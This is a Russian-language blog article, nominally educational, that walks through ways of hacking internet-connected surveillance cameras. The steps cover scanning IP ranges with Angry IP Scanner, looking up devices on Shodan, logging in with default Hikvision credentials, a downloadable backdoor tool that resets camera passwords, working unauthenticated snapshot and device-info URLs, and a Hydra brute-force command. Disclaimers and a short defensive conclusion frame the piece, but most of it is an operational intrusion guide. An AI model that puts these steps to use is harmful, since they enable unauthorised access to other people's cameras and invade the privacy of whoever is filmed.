Как взломать камеру видеонаблюдения? (в образовательных целях)

Обновлено 16 мая 2025 - 1 месяц назад

Хотите узнать, как взломать камеру видеонаблюдения? Эта статья написана для того, чтобы вы знали, как защитить свои IP-камеры и избежать их взлома.

Пожалуйста, не вмешивайтесь в работу камер наблюдения, которые вам не принадлежат.

Итак, давайте погрузимся в информацию об IP-камерах и о том, как их взламывают злоумышленники в Интернете.

В этой статье я пошагово объясню, какие методы используют хакеры для проникновения в IP-камеры и записывающие устройства, такие как видеорегистраторы и NVR.

Методы взлома камеры наблюдения

Существуют различные способы взлома камер видеонаблюдения: некоторые из них просты, некоторые - более техничны, а некоторые вообще не поддаются взлому.

Давайте рассмотрим следующие методы:

1. Используя сайт, предоставляющий взломанные камеры видеонаблюдения

Это не совсем взлом, но самый простой способ. Существуют сайты со множеством взломанных камер видеонаблюдения. Достаточно просто зайти на такой сайт.

Такие сайты создаются хакерами, которые проникают в IP-камеры наблюдения или DVR (цифровые видеорегистраторы) и предоставляют информацию бесплатно.

В итоге вы ничего не взламываете, а просто смотрите на камеру безопасности, которая была взломана кем-то другим.

На некоторых сайтах представлены списки взломанных камер видеонаблюдения по всему миру, организованные по производителям, странам, местоположению, городам и часовым поясам.

Ниже приведен пример камер видеонаблюдения, установленных в торговых центрах.

Администратор сайта утверждает, что это самый большой в мире каталог камер наблюдения и что частная жизнь людей будет соблюдена, если показывать только отфильтрованные камеры (что бы это ни значило).

Согласно сообщению на главной странице сайта, камеры видеонаблюдения могут быть удалены с сайта, если кто-то пришлет письмо с просьбой об этом.

2. Взлом камеры видеонаблюдения с помощью паролей по умолчанию

Это тоже не совсем взлом, но он работает. Вам просто нужно найти камеру безопасности в Интернете и попытаться использовать пароль по умолчанию, многие устройства в Интернете все еще используют тот же оригинальный пароль с завода.

Идея заключается в том, чтобы изучить руководство по эксплуатации IP-камеры и найти пароль по умолчанию, который можно использовать для взлома камеры наблюдения (или видеорегистратора).

Как найти IP-камеру в Интернете

Итак, прежде чем пробовать пароль по умолчанию для взлома камеры видеонаблюдения, вам нужно найти их в Интернете, и для этого есть разные способы, давайте проверим первый метод, который использует сетевой IP-сканер для поиска IP-устройств в Интернете.

В этой статье я покажу вам, как использовать Angry IP Scanner для сканирования интернета и поиска IP-камер и записывающих устройств (DVR и NVR).

ШАГ 1 - Скачать сканер Angry IP

Убедитесь, что у вас установлена Java, и загрузите правильную версию для вашего компьютера.

ШАГ 2 - Установите сканер Angry IP

Установка очень проста, вам просто нужно запустить установочный файл и следовать инструкциям, как показано на рисунках ниже:

ШАГ 3 - Настройка портов Angry IP Scanner и fetcher

Чтобы найти нужную информацию для взлома IP-камер , необходимо настроить порты Angry IP Scanner и устройства сбора данных таким образом, чтобы они могли отображать нужную информацию. Конфигурация показана на рисунке ниже.

Настройте порты 80, 23, 8080, 8081 и 8082, которые чаще всего используются людьми, устанавливающими IP-камеры и предоставляющими им доступ в Интернет.

Настройте устройства сбора данных на отображение информации Web Detect, которая покажет некоторые сведения об устройстве, полезные для поиска производителя.

Чтобы взломать камеру видеонаблюдения, вам необходимо иметь следующие основные сведения

Перейдите к инструментам и нажмите на fetchers, чтобы открыть окно конфигурации.

Выберите веб-детектор в правой части и нажмите на стрелку, чтобы переместить его в левую часть так, чтобы он отображался на главной странице программы.

ШАГ 4 - Выберите диапазон IP-портов для сканирования

Чтобы взломать камеру видеонаблюдения, сначала нужно найти такую камеру, которая доступна в Интернете, поэтому необходимо выбрать диапазон IP-адресов для сканирования с помощью Angry IP scanner. На рисунке ниже показан диапазон IP-адресов, который был просканирован.

Вы можете использовать диапазон IP-адресов вашей страны или поставщика услуг, в примере выше использован диапазон от xx.242.10.0 до xx.242.10.255. Обратите внимание, что вы можете заполнить первую часть диапазона IP-адресов и выбрать, например, /24 или /16, чтобы программа нашла вам диапазон с 254 или 65.534 хостами соответственно.

По соображениям конфиденциальности первая часть IP не отображается, но после нескольких сканирований я смог найти два видеорегистратора Hikvision , которые находятся в сети. Я знаю это благодаря информации о веб-детекторах, которую показывает DNVRS-Webs .

Сканирование может осуществляться по тысячам IP-адресов, поэтому довольно часто можно встретить множество IP-камер, видеорегистраторов и сетевых видеорегистраторов, подключенных к Интернету.

После того как вы нашли IP-камеру или видеорегистратор в Интернете, вам нужно просто щелкнуть правой кнопкой мыши и выбрать пункт "Открыть в веб-браузере". Как показано на рисунке ниже.

В данном случае речь идет о видеорегистраторе Hikvision, и вы можете просто попробовать использовать пользователя и пароль по умолчанию: " admin/12345 ", которые можно найти в руководстве Hikvision.

Обратите внимание на название производителя (Hikvision) под экраном входа в систему. Иногда вы видите большой логотип, а иногда - мелкий текст, как здесь.

Вы поняли, о чем идет речь? Чтобы взломать камеру наблюдения, достаточно воспользоваться инструментом сканирования Интернета, найти устройство в сети и попробовать ввести пароль по умолчанию, который можно получить из инструкции производителя или из списка паролей по умолчанию для IP-камер.

Ниже приведено изображение с DVR после входа в систему с учетными данными admin/12345 .

Проще показать пример с этим производителем (Hikvison), потому что их устройств много по всему миру, но процесс работает и с другими брендами, если вы видите информацию Web Detect остется использовать стандартные учетные данные администратора/пароля для взлома камеры видеонаблюдения.

Подробности процесса взлома камеры видеонаблюдения

Важно понимать процесс взлома, чтобы вы могли защитить себя от хакеров, пытающихся взломать вашу IP-камеру безопасности.

Сетевой сканер (Angry IP scanner) используется для получения информации с маршрутизатора, находящегося в Интернете, как показано на рисунке ниже:

Помните, что этот процесс естественный, маршрутизатору не нужно скрывать информацию, и он сам ответит, какие сервисы ему доступны.

Этот процесс можно сравнить с обычным магазином: владелец не скрывает, где он расположен и какие услуги предлагает, чтобы люди могли зайти и воспользоваться ими. Владелец просто не дает ключи от магазина в общее пользование.

3. Взломать камеру видеонаблюдения с помощью шодана

Эта техника взлома камер видеонаблюдения очень похожа на предыдущую, но вам не нужно устанавливать программу для сканирования сети, этот процесс уже сделан за вас, и вам нужно только попытаться использовать учетные данные.

Shodan - это веб-сервис, который показывает интернет-устройства по всему миру, включая IP-камеры безопасности, DVR и NVR.

Просто введите бренд IP-камеры или название производителя, и Shodan покажет вам множество информации, включая количество устройств по всему миру, местоположение, IP-адрес и открытые порты.

Взгляните на картинку ниже и посмотрите, сколько информации доступно

Если вы создадите бесплатный аккаунт на сайте, Shodan позволит вам фильтровать информацию. Ниже приведен пример, в котором информация отфильтрована по стране (Бразилия), и посмотрите на детали, которые включают в себя количество камер в городе (Сан-Паулу) и даже провайдера (Vivo).

Shodan показывает подробную информацию об IP-устройстве

Чтобы просмотреть детали IP-устройства, просто нажмите на ссылку "Детали", и откроется новое окно, в котором будет отображена вся информация о камере видеонаблюдения.

Информация о местонахождении устройства и его владельце

В окне подробностей отображается IP-адрес устройства и даже название организации.

Информация о порте устройства

Как мы уже видели, каждое IP-устройство в Интернете имеет свой собственный IP, а также некоторые сервисы, доступные через определенные порты. Shodan может показать эту информацию очень наглядно, как показано на рисунке ниже.

Как только вы увидите подробности, вам просто нужно использовать веб-браузер, чтобы ввести IP-адрес и порт IP-устройства и попытаться использовать пользователя и пароль по умолчанию, как описано ранее в этой статье. Смотрите рисунок ниже.

Для этой камеры просто ввели IP и порт следующим образом: XX.226.219.250 : 88

Если пароль IP-камеры никогда не меняли, вы сможете войти в систему, используя пароль устройства по умолчанию.

4. Взлом камеры видеонаблюдения с помощью эксплойта (программного обеспечения)

Итак, в случае, если имя пользователя и пароль по умолчанию были кем-то изменены, описанный выше метод не сработает.

Когда IP-устройство имеет проблемы с безопасностью, хакеры могут создавать эксплойты для автоматизации процесса взлома. Это происходит и с IP-камерами.

Дефект IP-камеры безопасности Hikvision

В марте 2017 года в IP-камерах Hikvision была обнаружена брешь в системе безопасности, которая позволяла получить прямой доступ к информации об устройстве, такой как модель, серийный номер, версия прошивки и пользователи.

Сообщение о проблеме поступило в компанию Hikvision 6 марта 2017 года, которая оперативно провела расследование и признала неисправность.

Через пять дней Hikvision выпустила исправление проблемы, но камеры, использующие более старую прошивку, по-прежнему уязвимы к этому дефекту безопасности.

Как работает эксплойт для IP-камер

В качестве примера я расскажу о программе, предназначенной для эксплуатации уязвимости в IP-камерах Hikvision, использующих старую специфическую прошивку.

Инструмент для работы с IP-камерами Hikvision

Итак, Hikvision IP camera exploit очень прост в использовании, как показано на рисунке выше, злоумышленникам просто нужно запустить его на своем компьютере или ноутбуке, чтобы исследовать и взломать камеру видеонаблюдения, находящуюся онлайн в Интернете или в вашей локальной сети.

Загрузите инструмент эксплойта Hikvision Backdoor.

Очевидно, что для правильной настройки программного обеспечения вам потребуется информация об IP-камере, и я настоятельно рекомендую использовать этот инструмент для IP-камер Hikvision, которые принадлежат вам или для которых у вас есть разрешение на тестирование системы безопасности.

Я не несу ответственности за ваши действия. Не следует взламывать камеры наблюдения, которые вам не принадлежат. Вы можете использовать инструмент эксплойта Hikvision для проверки IP-камер и убедиться, что уязвимость в них устранена с помощью обновления прошивки.

Итак, теперь, когда вы знаете, что не следует взламывать чужие IP-камеры, давайте поговорим об инструменте эксплойта Hikvision. Смотрите изображение ниже.

Эксплойт может скомпрометировать камеру наблюдения, получив список внутренних пользователей IP-камеры и установив новый пароль для одного из них по своему выбору.

Чтобы воспользоваться программой, просто выполните следующие действия:

1. Введите IP-адрес и порт камеры
2. Нажмите Получить список пользователей.
3. Выберите пользователя для изменения пароля
4. Введите новый пароль и нажмите кнопку

После выполнения этих шагов вам нужно будет просто ввести IP-адрес и порт камеры в веб-браузер и войти в систему, используя только что созданные учетные данные.

Камеры, пострадавшие от уязвимости в системе безопасности

Ниже перечислены модели камер Hikvision, которые подвержены этой уязвимости. Если у вас есть одна из них, просто обновите прошивку, чтобы устранить проблему и предотвратить взлом вашей камеры наблюдения.

5. Взлом камеры видеонаблюдения с помощью простой команды

Как получить информацию об IP-камере

Также можно взломать камеру Hikvision, просто отправив определенную команду, которая получит информацию о камере или сделает снимок экрана. Этой проблеме подвержены те же модели и версии прошивки, которые описаны выше.

Если ввести IP-адрес и порт камеры, а затем выполнить приведенную ниже команду, вы увидите подробную информацию о камере, такую как имя устройства, модель и версия прошивки.

System/deviceInfo?auth=YWRtaW46MTEK

Итак, полный состав команды выглядит следующим образом:

<IP-камера>:<порт камеры> System/deviceInfo?auth=YWRtaW46MTEK

Камера выдает информацию, как показано на рисунке ниже:

<DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">

<deviceName>IP CAMERA</deviceName>

<deviceID>88</deviceID>

<deviceDescription>IPCamera</deviceDescription>

<deviceLocation>hangzhou</deviceLocation>

<systemContact>Hikvision.China</systemContact>

<model>DS-2CD2420F-IW</model>

<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>

<macAddress>a4:14:37:xx:xx:xx</macAddress>

<firmwareVersion>V5.4.5</firmwareVersion>

<firmwareReleasedDate>build 170123</firmwareReleasedDate>

<bootVersion>V1.3.4</bootVersion>

<bootReleasedDate>100316</bootReleasedDate>

<hardwareVersion>0x0</hardwareVersion>

</DeviceInfo

Как сделать снимок экрана с камеры

Просто выполнив подобную команду, вы можете сделать снимок экрана IP-камеры и увидеть, что находится за камерой наблюдения. Это недостаток безопасности.

Ниже приведена команда для создания скриншота экрана IP-камеры.

onvif-http/snapshot?auth=YWRtaW46MTEK

Итак, полный состав команды выглядит следующим образом:

<IP-камера>:<порт камеры> onvif-http/snapshot?auth=YWRtaW46MTEK

При подаче этой команды на IP-камеру Hikvision в веб-браузере появится изображение, показанное ниже, без необходимости аутентификации.

Отказ от ответственности: Изображение выше получено с камеры Hikvision, которая использовала старую версию прошивки, описанную ранее в этой статье. Компания исправила эту проблему, поэтому новые модели не имеют этого недостатка безопасности.

6. Взлом камеры видеонаблюдения методом грубой силы

Представьте, что камера наблюдения использует пароль, основанный на распространенном слове, которое можно найти в словаре, например " дом, секрет" и т. д.

Кто-то может взломать камеру наблюдения, просто перепробовав все эти пароли, пока не найдет нужный.

Сейчас вы думаете, что этот метод слишком сложный и медленный, ведь сложно набрать любое слово, которое есть в словаре, чтобы найти то, которое подойдет для входа в камеру наблюдения, верно?

Если вы поручите эту задачу программе, способной проверять сотни или тысячи паролей в минуту, у вас будет больше шансов на успех.

Посмотрите на диаграмму ниже, чтобы понять, как работает эта техника.

Вы можете использовать Hydra для Linux или Windows, и вам просто нужно подготовить файл с паролями, указать слова, которые вы хотите использовать, и выполнить команду

hydra -s 88 -l admin -P /root/desktop/pass.txt -e ns <IP-камера>

Синтаксис выглядит следующим образом

-s 88 -- номер порта IP-камеры
-l admin -- имя пользователя, которое будет использоваться по умолчанию (admin)
-P /root/desktop/pass.txt -- файл со списком паролей
-e --- пустой пароль
ns --- попытка входа и пустой пароль

Программа запускается и начинает пробовать разные слова, полученные из txt-файла, и делает это до тех пор, пока не найдет нужное. Если камера наблюдения позволяет такие быстрые попытки, то для программы найти правильный пароль - дело времени.

Современные IP-камеры наблюдения не допускают такого типа атак методом грубой силы, поскольку после слишком большого количества попыток входа в систему они на некоторое время блокируются.

Заключительные слова и вывод

Существуют различные способы взлома камер видеонаблюдения, и все они предполагают наличие хотя бы базовых навыков у злоумышленника, который должен обладать хотя бы некоторыми знаниями об Интернете и о том, как пользоваться компьютерами и программным обеспечением.

Помните, что любое IP-устройство, подключенное к Интернету, подвержено риску, и нет никакой гарантии, что оно на 100% безопасно и не может быть взломано кем-то.

Идея этой статьи - помочь людям понять, как можно защитить свою камеру видеонаблюдения от взлома и как минимизировать шансы злоумышленника.

Другие материалы по теме

Простой способ бесплатно просматривать камеры безопасности из любой точки мира! Узнайте как!

16 апреля 2024

Как функция распознавания лиц в камерах наблюдения может изменить мир?

15 апреля 2024

Как настроить съемку по тревоге на камере безопасности?

15 апреля 2024

Как подключить сетевой PTZ-контроллер к видеорегистратору или NVR?

15 апреля 2024